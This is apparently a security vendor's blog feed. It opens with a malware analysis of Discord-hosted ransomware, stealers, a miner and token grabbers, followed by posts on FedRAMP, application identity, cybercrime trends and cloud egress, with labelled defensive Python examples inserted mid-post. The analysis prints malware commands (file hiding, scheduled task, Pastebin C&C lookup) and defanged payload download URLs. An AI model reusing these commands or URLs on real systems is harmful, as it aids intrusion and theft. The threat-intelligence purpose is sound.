Figure 5: Searching drives for file encryption
The custom AES algorithm uses 256-bit encryption.
Figure 6: Custom AES algorithm
It also uses a custom RC4 encryption that has a 2048-bit variable-length key, whereas standard RC4 encryption uses a 256-bit variable-length key.
Figure 7: Custom RC4 algorithm
It downloads the ransom note image from the link to show on the victim’s machine upon successful encryption.
Figure 8: Downloading READ_ME.hta file
The ransom note contains an email ID, EpsilonCrypt@tutanota[.]com, to communicate with the attacker for further information on payment and the decryption key/software. There is no C&C used by this ransomware variant.
Figure 9: Epsilon ransomware note with email ID to contact attacker
The ransomware deletes the shadow copies as well as the catalog to prevent the victim from recovering the original files, which are now encrypted.
Figure 10: Deleting shadow copy and catalog
Redline stealer (MD5: 67A29EF483B6A9485269D5B15A900119)
The next file we saw during our analysis is a Redline stealer. This stealer has been available on Russian underground forums since the first quarter of 2020 and is fairly new. It’s available as a standalone application and on a subscription basis, with prices ranging from $100 to $300 depending upon the version and capabilities. We have seen multiple samples of the Redline stealer blocked in the Zscaler cloud sandbox, and below is our analysis of a recent sample written in .NET.
Redline Stealer Functionalities
- Collects logins and passwords, cookies, autocomplete fields, credit cards
- Data collection from FTP clients, IM clients
- Customizable file-grabber based on path, extension
- Customizable to not work in a blacklisted country
- Collects information from the victim's machine: IP, country, city, current username, HWID, hardware information (video cards, processors), screenshot, screen resolution, keyboard layout, operating system, UAC settings, administrative privileges, user-agent, installed antiviruses
- Downloads a file from a URL to a specified location on the victim's machine
- Process injection
- Download and execute the file
- Supports all browsers based on Chromium
- Supports all Gecko-based browsers
Execution starts with dropping a copy of itself into the AppData/Roaming folder. The unpacked binary shows the author making use of several popular gaming application names for internal functions.
Figure 11: Redline stealer .NET function names using popular gaming applications.
The stealer is capable of collecting data from several FTP and IM clients installed on the victim's machine, as seen below:
Figure 12: Data collection from FTP clients, IM clients
Figure 13 shows a module that is responsible for collecting information from browsers, such as stored cookies and credit card information.
Figure 13: Stealing credit card info
In addition to the functions that grab data from browser, FTP, and IM clients, the malware also steals the victim's cryptocurrency wallet and collects the victim's geolocation, hardware information, and client IP address.
SOAP over HTTP for C&C
Redline stealer uses SOAP over HTTP for C&C communication. The malware is developed in the .NET framework, where using SOAP is very easy and also provides the additional advantage of being independent of the underlying protocol.
Figure 14: Getting config settings from C&C
All the data collected according to the configuration settings is sent back to the C&C server.
Figure 15: Sending stolen client info
After sending the collected data to the C&C server, the stealer is tasked with downloading and executing additional payloads based on the victim's machine information.
Figure 16: Receiving a task from the C&C server
The remote task action module is used to download and execute the files as instructed by the C&C server.
Figure 17: Remote task action
XMRig miner (MD5: 41F5CF39159295CFECE4D6B37BEB2D6D)
The next malware we have been seeing in this ongoing campaign is XMRig miner. The miner’s execution starts by dropping a copy of itself at %ProgramData%\RealtekHDUpdater\realtekdrv.exe. The malware also changes the file attributes (hidden, system, read-only) using the following command:
%ProgramData%\RealtekHDUpdater" & ATTRIB +h +s +r %ProgramData%\RealtekHDUpdater\cuda-helper.dll"& ATTRIB +h +s +r %ProgramData%\RealtekHDUpdater\nvrtc-builtins64_100.dll"& ATTRIB +h +s +r
This is done to use the miner capabilities without user permissions.
The malware connects to the C&C server using the following command:
Cmd open (class="de1">)(.*)(</div></li>).https://pastebin(.)com/VKRXfjxX, which yields
Notice the usage of a PasteBin URL to store the C&C server location. The malware then creates a scheduled task:
/CREATE/SC MINUTE /MO 1/TN "Realtek Updater"
The miner also tries to delete some programs that can be used to detect the miner or impact its efficiency, such as games. The following is the list of programs the miner tries to delete:
Process Hacker, Task Manager, Windows, Windows Task Manager, AnVir Task Manager, Taskmgr.exe, taskmgr.exe, procexp64.exe, procexp32.exe, perfmon.exe, procmon.exe, csgo.exe, dota2.exe, RainbowSix_Vulkan.exe, RainbowSix.exe, FortniteClient-Win64-Shipping.exe, EscapeFromTarkov.exe, Rust.exe, VALORANT.exe, Overwatch.exe, gta_sa.exe, GTA5.exe, Radeon, NVIDIA GeForce
After this, the miner is launched using the following Monero address:
4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQswVtyKcWBsLoeY6A2
Discord token grabbers (MD5: 5dd2400c3b6e3178eedde22c2427fda9)
Cloud apps have become a mainstay for gamers just as they have for business and individual users. Cloud apps are great for interactivity, but they can also be leveraged for malicious attacks. "Discord token grabber" is a broad term used to describe attacks that use Discord tokens to steal user information. In this case, the stealer uses the Discord app to steal data from the user and send it to a predetermined C&C server. Below is a screenshot of the token grabber code extracted from a recent payload:
Figure 18: Stealer code
Here, the program collects user information, for example Environment.UserName, and sends it using a webhook defined in the dcWebHook.WebHook variable.
Figure 19: JSON response when the URI is visited
TroubleGrabber (MD5: 2c178066d48d69dd56923343d338a376)
This is a known stealer that uses Discord tokens to steal and send user data to its C&C.
This stealer both spreads and communicates through the Discord app, using Discord URLs for attachments like cdn[.]discordapp[.]com/attachments/[0-9]{18}/[0-9]{18}/Nameofattachment.rar. The name of the attachment can vary from the name of a software application used by most users to cracked versions of games or tools, such as Discord Server Tool.exe, Galaxy Security Panel.exe, Vron Software.exe, CrackHub 2021.exe, or Vape V4 Cracked.exe. TroubleGrabber fetches payloads from https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator to begin its next stage after being executed on the victim's machine. These files are as follows:
https://cdn[.]discordappp[.]com/attachments/797230131218874430/797241057136869446/sendhookfile[.]exe[.]vbs
https://cdn[.]discordapp[.]com/attachments/797230131218874430/797241059254992916/Token_Stealer[.]bat
https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/raw/master/AVOID%20ME/WebBrowserPassView[.]exe
https://github[.]com/Itroublve/Token-Browser-Password-Stealer-Creator/raw/master/AVOID%20ME/curl[.]exe
Coverage
The malware payloads observed in these campaigns were successfully blocked by the Zscaler Cloud Sandbox.
Figure 20: Zscaler Cloud Sandbox report of Epsilon ransomware
Figure 21: Zscaler Cloud Sandbox report of Redline stealer
Figure 22: Zscaler Cloud Sandbox report of XMRig miner
Detections:
Win32.Ransom.Epsilon
Win32.PWS.Redline
Win32.Coinminer.Xmrig
Win32.PWS.TroubleGrabber
Conclusion
Discord is primarily a chat platform built for gamers and is becoming increasingly popular among other professional communities for sharing information. We’re observing an increase in attackers' use of the Discord app to deliver malicious files. Because of its static content distribution service, it is highly popular among threat actors for hosting malicious attachments that remain publicly accessible even after the actual files are removed from Discord.
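As an added, defensive illustration (not code from the ThreatLabZ write-up): the attachment URL shape described above, cdn.discordapp.com/attachments/<18 digits>/<18 digits>/<name>, is easy to match in web proxy logs and to combine with a check on the attachment name. The log lines, channel and attachment IDs, and file names below are constructed, and the executable and archive extension lists are assumptions drawn from the file types seen in this post.

```python
"""Flag Discord CDN attachment downloads of executable content in proxy logs.

Added example (not from the ThreatLabZ write-up). Log lines and IDs are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# URL shape used by these campaigns: two 18-digit IDs, then the attachment name.
ATTACHMENT_URL = re.compile(
    r"https?://cdn\.discordapp\.com/attachments/"
    r"(?P<channel>\d{18})/(?P<attachment>\d{18})/(?P<name>[^\s?#]+)",
    re.IGNORECASE,
)

# Assumed watch lists: file types this post shows carrying payloads, plus a few
# common executable and archive types.
EXECUTABLE_EXT = {"exe", "bat", "vbs", "hta", "dll", "scr", "ps1", "js", "msi"}
ARCHIVE_EXT = {"rar", "zip", "7z"}


@dataclass
class Finding:
    channel_id: str
    attachment_id: str
    filename: str
    reason: str


def classify(filename: str) -> Optional[str]:
    """Return why an attachment name is risky, or None for a benign-looking name."""
    parts = filename.lower().split(".")
    if len(parts) < 2:
        return None
    exts = parts[1:]
    # sendhookfile.exe.vbs style: an executable extension hidden before the last one
    if len(exts) >= 2 and any(e in EXECUTABLE_EXT for e in exts[:-1]):
        return "double extension hiding executable"
    last = exts[-1]
    if last in EXECUTABLE_EXT:
        return f"executable content (.{last})"
    if last in ARCHIVE_EXT:
        return f"archive (.{last}) that may wrap an executable"
    return None


def scan_proxy_log(lines: Iterable[str]) -> List[Finding]:
    """Match Discord CDN attachment URLs in log lines and keep the risky ones."""
    findings = []
    for line in lines:
        m = ATTACHMENT_URL.search(line)
        if not m:
            continue
        reason = classify(m.group("name"))
        if reason:
            findings.append(Finding(m.group("channel"), m.group("attachment"),
                                    m.group("name"), reason))
    return findings


def fake_id(n: int) -> str:
    """Constructed 18-digit ID (the attachment IDs in this campaign are 18 digits)."""
    return str(10**17 + n)


# Constructed proxy log lines: timestamp, client, method, URL, status.
SAMPLE_LOG = [
    f"2021-02-09T10:01:02Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/{fake_id(1)}/{fake_id(2)}/GameTool.exe 200",
    f"2021-02-09T10:01:07Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/{fake_id(1)}/{fake_id(3)}/sendhookfile.exe.vbs 200",
    f"2021-02-09T10:02:11Z 10.0.0.7 GET https://cdn.discordapp.com/attachments/{fake_id(4)}/{fake_id(5)}/team_photo.png 200",
    f"2021-02-09T10:03:45Z 10.0.0.9 GET https://cdn.discordapp.com/attachments/{fake_id(6)}/{fake_id(7)}/Token_Stealer.bat 200",
    "2021-02-09T10:04:00Z 10.0.0.9 GET https://example.com/downloads/installer.exe 200",
    f"2021-02-09T10:05:30Z 10.0.0.5 GET https://cdn.discordapp.com/attachments/{fake_id(1)}/{fake_id(8)}/cracked_pack.rar 200",
]


if __name__ == "__main__":
    for f in scan_proxy_log(SAMPLE_LOG):
        print(f"{f.filename}: {f.reason} (channel {f.channel_id}, attachment {f.attachment_id})")
```

The channel ID is worth keeping in the finding: several downloads from one channel ID across different clients is a stronger signal than any single file name.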
The Zscaler ThreatLabZ team will continue to monitor Discord-based malware campaigns, share the information with the community, and keep our customers safe.
MITRE ATT&CK:
ID | Technique | Description
T1078 | Valid Accounts | Uses valid accounts to access email
T1107 | File Deletion | Self-delete
T1204 | User Execution | User interaction
T1268 | Conduct social engineering | Uses social engineering to install the payload
T1489 | Service Stop | Stops critical services
T1528 | Steal Application Access Token | Steals the access token for a valid account
T1490 | Inhibit System Recovery | Deletes shadow copies on a system
T1222 | File Directory Permissions Modification | Changes directory permissions to hide its file
T1555 | Credentials from password store | Steals stored passwords
T1056 | Keylogging | Keylogs the infected machine
T1055 | Process Injection | Injects code into other processes
Indicators of Compromise
Tue, 09 Feb 2021 15:17:50 -0800 Avinash Kumar
FedRAMP JAB Certification at the High Impact Level: Another ZIA Milestone
Today, on behalf of the entire team at Zscaler, I’m proud to share an important step forward in our commitment to help federal agencies take advantage of modern, cloud-based technology, securely. The FedRAMP Connect program announced that Zscaler Internet Access (ZIA) is prioritized for Joint Authorization Board (JAB) FedRAMP certification at the High Impact Level. ZIA, combined with Zscaler Private Access (JAB authorized at the High Impact Level), is the core of the Zscaler Zero Trust Exchange. The JAB selects an extremely limited number of providers for review each year – the primary criterion is government-wide demand for the solution. Zscaler’s selection underscores the value we are delivering to the 100+ federal agencies, Federal Systems Integrators (FSIs), and partners, and close to one million total users that we currently support, and the widespread interest in and need for our solutions across the federal government. The FedRAMP Connect team shared they are “proud to see the scope and scale of innovation and infrastructure modernization that this next group of vendors represent for JAB authorizations.” In 2019, ZIA became the first cloud-based secure web gateway solution to earn FedRAMP certification. In 2020, Gartner recognized Zscaler as the only leader in its December 2020 Magic Quadrant for Secure Web Gateways.
Today’s announcement underscores the Zscaler Zero Trust Exchange and Zscaler Advanced Cloud Sandbox as the industry model for the successful implementation of the Cybersecurity and Infrastructure Security Agency’s (CISA’s) Trusted Internet Connection (TIC) 3.0 guidelines, helping to keep civilian agencies and employees safe, productive, and focused on their mission. In 2020, ZPA achieved a FedRAMP JAB High authorization. A JAB High Baseline authorization for ZIA is a significant step forward, enabling Zscaler to offer more comprehensive solutions in the government marketplace, including Advanced Cloud Sandbox, Zscaler Digital Experience (ZDX), and Zscaler Cloud Connector. Certification at the High Impact level also enables Zscaler to support more customers in the Department of Defense (DoD) and Intelligence Community (IC) organizations. High Impact certification signals that the solution can protect government’s most sensitive, unclassified data in cloud environments, including data where loss of confidentiality, integrity, or availability may have a catastrophic effect on operations, assets, or individuals. This progress comes at a critical time. The past year intensified pressure on federal IT teams. The urgent need for secure federal IT transformation is front and center. We are proud to support our customers as they keep employees teleworking safely and productively, while enhancing efficiency with shared services. By providing them with a secure cloud foundation, we are enabling them to take advantage of emerging technologies—AI/machine learning, IoT, and 5G—and build a more innovative and secure future government. To read more about this important achievement for Zscaler, check out our press release here or visit our Zscaler for Government page.
Tue, 02 Feb 2021 05:05:01 -0800 Stephen Kovac
What is Application Identity and Why Does it Matter?
Most security practitioners think in terms of protecting the “crown jewels,” whatever those may be relative to the specific business. While each company is different in terms of its resident data and applications or services, every company relies on data and applications/services to function. If those things are compromised in any way, the company is faced with repercussions (relative to the size of the compromise). Regardless of the magnitude of an incident, any time a security team needs to respond to one, it means the confidentiality, integrity, or availability of the data and/or systems has been called into question—in other words, some person or system resource has gained unauthorized access to the company’s “crown jewels.” And while at a theoretical level this quandary resonates with security practitioners, companies’ “crown jewels” continue to be secured using tools that sit far away from the assets themselves and that rely largely on network IP addresses, ports, and protocols that are easy for attackers to compromise. It’s important for security professionals to put the things they are tasked with protecting back at the center of their security strategy. The answer: application identity. Identifying apps/services by their attributes/characteristics/immutable properties allows security teams to build policies based on which applications and data are present, running, and communicating on the network. Doing so extracts security policy from the underlying network infrastructure and ties it directly to the “crown jewels.” The first key to application identity: Unchanging characteristics An application’s identity must be based considerably on immutable properties—properties an attacker cannot change—and cryptographic signatures of the application. An example of an unchanging property would be the SHA 256 hash of a binary. If a single bit of that binary changes, that hash is going to result in a different value. You're going to get a different identity. 
Other examples of unchanging characteristics include attributes like the universally unique identifier (UUID) of the system’s BIOS and serial numbers of the CPUs—things that are so fundamental to the system that an attacker cannot change them. The key to immutability is ensuring that the core characteristics of an application or service remain reliable enough to uniquely identify each app/service for verification in a zero trust environment without locking the app/service into where it can’t be upgraded, updated, or improved. The second key to application identity: Understandable characteristics One problem with using traditional security tools to protect applications on the network is translating “application speak” (how the app was written) into “network speak” (how security tools function). This mismatch has turned into a wrestling match between many development and security teams. To avoid such conflict, using understandable characteristics of applications to define them means that both security/networking and development/application teams can communicate in a common language. Oblique, opaque, or arbitrary characteristics erode confidence in their usefulness to function as identifiers. Using characteristics that make sense to the practitioner makes them more likely to trust and use the resulting application identity. What does “understandable” mean in practical terms? You might have an application, such as java.exe, where the actual process name represents the application running, but the java.exe binary itself, which might give you some specifics, could be used for multiple applications. One of the most critical things we use understandable traits for is to abstract and identify them against applications to practitioners, to security professionals, because most people who see a SHA 256, will have no idea what it is. 
On the other hand, if they see an application they're familiar with [such as java.exe], they will have a much better idea of what's going on on their network. The third key to application identity: A broad variety of characteristics As mentioned in “the first key,” an application’s identity must be based on a combination of many attributes, not just a smattering that could potentially be used to identify multiple applications. Identifying an application based on a large collection of attributes means that some parts of the identity can change (for example, through software updates) without changing the overall fingerprint of the application. This would be akin to identifying a person based on height, blood type, DNA, (point-in-time) age, eye color, hair color, what kind of clothes they wear, speech patterns, how they walk, where they live, biological parents, etc. Some of these things can change easily while others are inevitably fixed. Using a cross-section of attributes provides the baseline for the application’s identity and allows administrators to add other more variable traits that further describe the application without losing confidence in the accuracy and viability of the identity. Using a broad variety of characteristics, organizations can choose the ones that comprise the correct combination of features, which allows them to make the best generalizations about the identity and behavior of the application when it’s communicating in the network. The fourth key to application identity: Upgrade-tolerance Created application fingerprints must be upgrade-tolerant, allowing for new versions of software without necessitating an overhaul of security policies every time software is patched or upgraded. A good illustration of upgrade tolerance is this: If you upgrade Java, the SHA 256 will be completely different, unpredictably different. But the fuzzy hash will be mostly the same because the underlying binary is still mostly the same.
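To make the upgrade-tolerance point concrete, here is an added example (illustrative code, not Zscaler's implementation) that fingerprints two constructed "binaries": a simplified content-defined chunking scheme stands in for a real fuzzy hash such as ssdeep, and the byte patterns, the simulated patch, and the similarity thresholds are assumptions.

```python
"""Why a fuzzy fingerprint survives an upgrade when an exact hash does not.

Added example, not Zscaler's code. The "fuzzy hash" is a simplified stand-in for
context-triggered piecewise hashing (ssdeep-style): the file is cut at boundaries
chosen by a rolling hash of the last few bytes, each chunk is hashed, and the
similarity of two files is the Jaccard overlap of their chunk-hash sets.
"""
import hashlib
from typing import FrozenSet, List

WINDOW = 8    # bytes covered by the rolling hash
TARGET = 128  # target chunk size; a boundary fires when the low bits are all set


def content_defined_chunks(data: bytes, window: int = WINDOW, target: int = TARGET) -> List[bytes]:
    """Split data where a rolling polynomial hash of the last `window` bytes hits a mask.

    The boundary decision depends only on local content, so an edit in one place
    changes only the chunks around it and the rest of the file re-synchronises.
    """
    min_size, max_size, mask = target // 4, target * 4, target - 1
    pow_out = pow(31, window, 1 << 32)  # weight of the byte leaving the window
    chunks, start, h = [], 0, 0
    for i, b in enumerate(data):
        h = (h * 31 + b) & 0xFFFFFFFF
        if i >= window:
            h = (h - data[i - window] * pow_out) & 0xFFFFFFFF
        size = i - start + 1
        if (size >= min_size and (h & mask) == mask) or size >= max_size:
            chunks.append(data[start:i + 1])
            start = i + 1
    if start < len(data):
        chunks.append(data[start:])
    return chunks


def fuzzy_fingerprint(data: bytes) -> FrozenSet[str]:
    """Set of short chunk hashes; identical chunks produce identical entries."""
    return frozenset(hashlib.sha256(c).hexdigest()[:12] for c in content_defined_chunks(data))


def similarity(a: FrozenSet[str], b: FrozenSet[str]) -> int:
    """Percentage of chunk hashes shared by two fingerprints (Jaccard index)."""
    union = a | b
    return 100 * len(a & b) // len(union) if union else 100


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def pseudo_binary(seed: int, size: int) -> bytes:
    """Deterministic stand-in for a compiled binary (constructed test data)."""
    out, x = bytearray(), seed
    for _ in range(size):
        x = (1103515245 * x + 12345) & 0x7FFFFFFF
        out.append((x >> 16) & 0xFF)
    return bytes(out)


def compare_versions() -> dict:
    """v1, a patched v2 (one 8-byte region rewritten as 16 bytes, shifting everything
    after it), and an unrelated program: exact-hash equality versus fuzzy similarity."""
    v1 = pseudo_binary(1, 8192)
    v2 = v1[:4096] + b"PATCHED-FUNCTION" + v1[4096 + 8:]
    other = pseudo_binary(2, 8192)
    fp1, fp2, fp_other = fuzzy_fingerprint(v1), fuzzy_fingerprint(v2), fuzzy_fingerprint(other)
    return {
        "sha256_matches": sha256_hex(v1) == sha256_hex(v2),   # False: one bit is enough
        "upgrade_similarity": similarity(fp1, fp2),            # high: most chunks survive
        "unrelated_similarity": similarity(fp1, fp_other),     # ~0: nothing in common
    }


if __name__ == "__main__":
    for key, value in compare_versions().items():
        print(f"{key}: {value}")
```

A policy keyed on a similarity threshold rather than an exact digest is what lets the same rule keep covering java.exe across patch releases; the threshold itself is a tuning decision for the environment.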
This means that, by using a measurement of similarity by the fuzzy hash, we can say when an application is upgraded and when it's similar enough that we can use the same rules to cover that application. Using a combination of changing and unchanging identity attributes is important because it lets the user upgrade, have different versions, and create varied rules around applications that are very similar rather than about very, very specific binaries. In short Security must remain malleable while enforcing the highest level of protection possible. When security can adapt to its environment or updates (as software/apps/services are wont to do), it’s allowing the organization to evolve without sacrificing efficacy. Creating application fingerprints using the four keys described here allows organizations to look at the most salient parts of an application/service that describe, in the most distinctive way possible, what applications are present and talking to each other on the network. Around this, security policies that travel alongside the application (independent of network topology) can be built, ensuring the protection stays with what needs it most. Read the datasheet to learn how Zscaler Workload Segmentation enables application identity. Tue, 02 Feb 2021 08:00:01 -0800 Harry Sverdlove Did COVID Cancel Christmas for Cybercriminals? ThreatLabZ, the security research team at Zscaler, is responsible for monitoring and tracking global cybercrime activity, which typically drops each year around the Russian Orthodox Christmas on January 7th. In most years, activity increases back to normal near the middle to end of January. However, in 2021, cybercrime activity did not exhibit this cyclical pattern, which may be explained by COVID-19 travel restrictions that prevented many threat actors from taking an extended leave. Figure 1 shows that cybercrime activity last year began to rise starting around January 15, 2020, following a lull. 
In contrast, this year’s criminal activity remained at normal levels before, during, and after the Russian Orthodox Christmas.
Figure 1: Malware trends before and after the holiday season in 2019-2020
Figure 2: Malware trends before and after the holiday season in 2020-2021
The following sections describe recent activities for five of the top malware families, including Emotet, Trickbot, Dridex, ZLoader, and Qakbot.
Emotet
[Update] – On January 27, 2021, Europol announced a global action in disrupting Emotet botnet operations. This was a collaborative effort between law enforcement authorities in the Netherlands, Germany, U.S., UK, France, Canada, Lithuania, and Ukraine, with international activity coordinated by Europol and Eurojust. Zscaler ThreatLabZ has been closely tracking Emotet for several years (see blogs from October 2019, February 2019, and August 2017). We can confirm that we haven't seen any updates or activity from the Emotet C&C infrastructure in the past 48 hours, which indicates that the takedown operation has been successful. However, we have seen similar gangs push out new variants and resurrect the botnet using a new C&C infrastructure. We are closely monitoring for any new Emotet variants and activity. Emotet resumed its activity as of Monday, January 4, 2021. To take advantage of the holiday season, Emotet briefly ramped up its activity between December 21 and 30, 2020. During this ramped-up activity, Emotet was mostly using a reply chain (also known as email thread hijacking) spam email as the bait. A reply chain attack is when threat actors hijack real email threads and utilize legitimate email messages stolen from victims’ email applications. The threat actors then spoof a legitimate email and impersonate a reply to the stolen email. This email reply is again targeted to addresses from the original email, allowing it to further gain trust from targets.
While the first batch of emails targeted English-speaking countries, spam in German, Italian, French, Spanish, and Polish followed shortly thereafter. An example of an Emotet reply chain spam email in Italian is shown in Figure 3.

Figure 3: Emotet reply chain example

The main Emotet loader had some minor changes after returning from its brief break. The build version number was set to 0x13461BF (20210111), while the loader version number remained at 0x1388 (5000). Emotet continued to use spam with malicious Microsoft Word documents attached as its primary distribution method. On January 20, 2021, Emotet increased the build number to 0x13461C8 (20210120) and the loader version number to 0x1770 (6000).

Another interesting tactical move, starting in January, was the shift to password-protected ZIP attachments. Instead of putting the password in the email body text, Emotet began embedding an image that contains the ZIP password. This tactic is likely intended to defeat automation deployed by security products and researchers: a gateway or sandbox that extracts the password from the body text cannot open the archive to inspect its contents. The group has also continued to use a DLL file for the loader instead of a standard Windows executable, likely to further evade detection.

Emotet was last seen deploying the following modules:
- Proxy (UPnP) module
- Browser password stealer (based on NirSoft WebBrowserPassView)
- Email password stealer (based on NirSoft MailPassView)
- Email content stealer
- Email contact stealer

In addition, Emotet has been observed delivering Trickbot as a second-stage payload.

Indicators - Emotet IOCs

Trickbot

Emotet started dropping Trickbot as a secondary payload on victim machines after it returned from the holiday break. Trickbot is operated by the same threat actor that deploys Conti and Ryuk ransomware, so those ransomware operations likely resumed around the same time as well. Emotet distributed Trickbot with the group tags mor12 and mor13. There have not been any significant changes in Trickbot following the holiday break.
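The attachment tricks in this post (a password-protected ZIP whose password only exists in an attached image, and a ZIP carrying a script or Office file) are the kind of thing a mail gateway can catch without ever opening the archive. The following is an added example of such a heuristic, written for this edit; it is not ThreatLabZ tooling, and the messages, file names and the constructed "encrypted" archive (an ordinary ZIP with the encryption flag bit set in its headers) are all made up for the demo.

```python
"""Mail-gateway heuristics for password-in-image ZIPs and script-in-ZIP lures.

Added example, not ThreatLabZ tooling. The detector reads only ZIP metadata
(the encryption flag and entry names stay readable without the password), so
it works on the archives this tactic is designed to hide from sandboxes.
"""
import io
import re
import struct
import zipfile
from email.message import EmailMessage
from typing import Dict, List

RISKY_EXT = (".js", ".jse", ".vbs", ".wsf", ".hta", ".lnk", ".exe", ".dll",
             ".doc", ".docm", ".xls", ".xlsm")
ENCRYPTED_BIT = 0x1          # general-purpose flag bit 0 in ZIP headers
ZIP_TYPES = ("application/zip", "application/x-zip-compressed")


def build_zip(entries: Dict[str, bytes], encrypted: bool = False) -> bytes:
    """Constructed sample archive. With encrypted=True the encryption flag is
    set in every central and local header (entry data is left as is)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    raw = bytearray(buf.getvalue())
    if encrypted:
        cd = struct.unpack_from("<I", raw, len(raw) - 22 + 16)[0]   # EOCD -> central dir offset
        while struct.unpack_from("<I", raw, cd)[0] == 0x02014B50:   # central header signature
            name_len, extra_len, comment_len = struct.unpack_from("<HHH", raw, cd + 28)
            local = struct.unpack_from("<I", raw, cd + 42)[0]
            for off in (cd + 8, local + 6):                         # flag fields
                struct.pack_into("<H", raw, off, struct.unpack_from("<H", raw, off)[0] | ENCRYPTED_BIT)
            cd += 46 + name_len + extra_len + comment_len
    return bytes(raw)


def scan_message(msg: EmailMessage) -> List[str]:
    findings: List[str] = []
    body = msg.get_body(preferencelist=("plain", "html"))
    text = body.get_content() if body is not None else ""
    password_in_body = re.search(r"password", text, re.I) is not None
    has_image = has_encrypted_zip = False

    for part in msg.iter_attachments():
        ctype = part.get_content_type()
        name = (part.get_filename() or "").lower()
        if ctype.startswith("image/"):
            has_image = True
            continue
        if not (name.endswith(".zip") or ctype in ZIP_TYPES):
            continue
        payload = part.get_payload(decode=True) or b""
        try:
            with zipfile.ZipFile(io.BytesIO(payload)) as zf:
                infos = zf.infolist()
        except zipfile.BadZipFile:
            findings.append(f"unreadable-zip:{name}")
            continue
        if any(info.flag_bits & ENCRYPTED_BIT for info in infos):
            has_encrypted_zip = True
            findings.append(f"encrypted-zip:{name}")
        for info in infos:                 # names stay readable even when encrypted
            if info.filename.lower().endswith(RISKY_EXT):
                findings.append(f"risky-entry:{info.filename}")

    if has_encrypted_zip and not password_in_body:
        findings.append("password-not-in-body")
        if has_image:
            findings.append("password-image-lure")
    return findings


def make_message(subject: str, body: str, attachments) -> EmailMessage:
    msg = EmailMessage()
    msg["Subject"], msg["From"], msg["To"] = subject, "ops@example.net", "user@example.org"
    msg.set_content(body)
    for filename, maintype, subtype, data in attachments:
        msg.add_attachment(data, maintype=maintype, subtype=subtype, filename=filename)
    return msg


def sample_messages() -> Dict[str, EmailMessage]:
    """Constructed look-alikes of the lures above; nothing here is a real IOC."""
    return {
        "emotet_style": make_message("RE: invoice", "Please see the attached archive.", [
            ("pw.png", "image", "png", b"\x89PNG\r\n\x1a\n constructed"),
            ("invoice.zip", "application", "zip",
             build_zip({"invoice.doc": b"constructed"}, encrypted=True))]),
        "trickbot_style": make_message("Invoice", "Attached.", [
            ("invoice.zip", "application", "zip",
             build_zip({"invoice_1234.js": b"// constructed"}))]),
        "benign": make_message("Report", "The archive password is in the ticket.", [
            ("report.zip", "application", "zip", build_zip({"report.txt": b"ok"}))]),
    }


def demo() -> Dict[str, List[str]]:
    return {name: scan_message(msg) for name, msg in sample_messages().items()}


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

The "encrypted-zip" plus "password-image-lure" combination is the signal worth alerting on; an encrypted archive whose password is in the body is common in legitimate mail, which is why the two are scored separately.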
Trickbot was also distributed by another spam campaign on the same day, with the group tag rob35. This campaign was distributed via SpamEx, which delivered a malicious JavaScript file inside a ZIP archive. When opened, the JavaScript invoked PowerShell to download and execute Trickbot from phishing sites. Trickbot campaigns with the group tags tot6 and lib6 have also been observed since the holiday break.

Indicators - Trickbot IOCs

Dridex

On January 11, 2021, ThreatLabZ observed the re-emergence of Dridex via a Cutwail spam campaign. The group used an invoice theme to distribute the Dridex loader. The Cutwail spam delivered payloads for Dridex sub-botnets 10444 and 10555 as Microsoft Excel attachments. Dridex continues to use DLL files for its loader instead of Windows executables, a technique recently adopted by the Emotet and Qakbot threat groups as well. Another Dridex campaign, with botnet 111, was observed a day later, this time using the RIG exploit kit (EK). The same RIG EK gate had been used before the Christmas holiday.

Indicators - Dridex IOCs

Qakbot

On January 19, 2021, Qakbot emerged with a new spam campaign dropping a Qakbot payload with the campaign ID abc118. Like Emotet, Qakbot is using reply chain spam attacks; an example is shown in Figure 4. Qakbot was also seen using a "complaint copy" spam theme. Qakbot spam campaigns are distributing malicious Excel files inside a ZIP attachment. Like Emotet, Dridex, and ZLoader, Qakbot uses a DLL file for its loader instead of a Windows executable. This technique is now widely used by cybercriminals and apparently evades some security and sandbox solutions.

Figure 4: Reply chain spam email distributing Qakbot

Indicators - Qakbot IOCs

ZLoader

ThreatLabZ observed new ZLoader activity on January 11, 2021. The botnet then went quiet, resuming with another spam campaign on January 19.
So far in 2021, four different ZLoader campaigns have been observed, primarily targeting US and EU banks and financial institutions.

Indicators - ZLoader IOCs

Conclusion

Campaign frequency differs for each malware family. Some follow fairly regular Monday-through-Thursday cycles, while others, such as Emotet and Qakbot, are unpredictable. Usually, inactivity by cybercriminals or the absence of a malware strain is a sign of impending changes. Malware authors continually adapt their techniques and change their code to improve distribution, persistence, evasion, and overall success. ThreatLabZ continuously monitors activity from cybercrime gangs and their evolving malware strains, integrating all threat intelligence into the Zscaler platform so it can be distributed cloud-wide to protect all customers around the world.

Fri, 29 Jan 2021 14:19:11 -0800 Abhay Kant Yadav

Cloud-to-Internet Communications: Six Key Challenges

Cloud workloads need access to the internet for a variety of reasons, and opening that access introduces risk. While your workloads (hopefully) don't have web browsers installed from which users browse suspicious websites, legitimate access might mean API connectivity to a third-party service, software update services, and more. While enabling this access, it is critical that you protect these outbound communications so that bad actors cannot use them to gain a foothold in your network. Unfortunately, secure workload access to the internet has historically been far more complicated and costly than it should be. Let's use AWS as the example for this post, though most of the concepts apply to the other major cloud providers as well.

Six challenges with workload-to-internet communications

Most organizations have a number of VPCs in which they host applications and other services. Within each VPC, virtual next-generation firewalls (vNGFWs) are likely to be used to control east-west traffic flows within and across VPCs.
To secure internet access for those workloads, you typically build outbound VPCs in which to layer virtual security appliances: virtual firewalls, DLP services, threat protection VMs, and more. Each of these services carries a licensing fee, adds another vendor to deal with, and requires expertise to manage and operate properly.

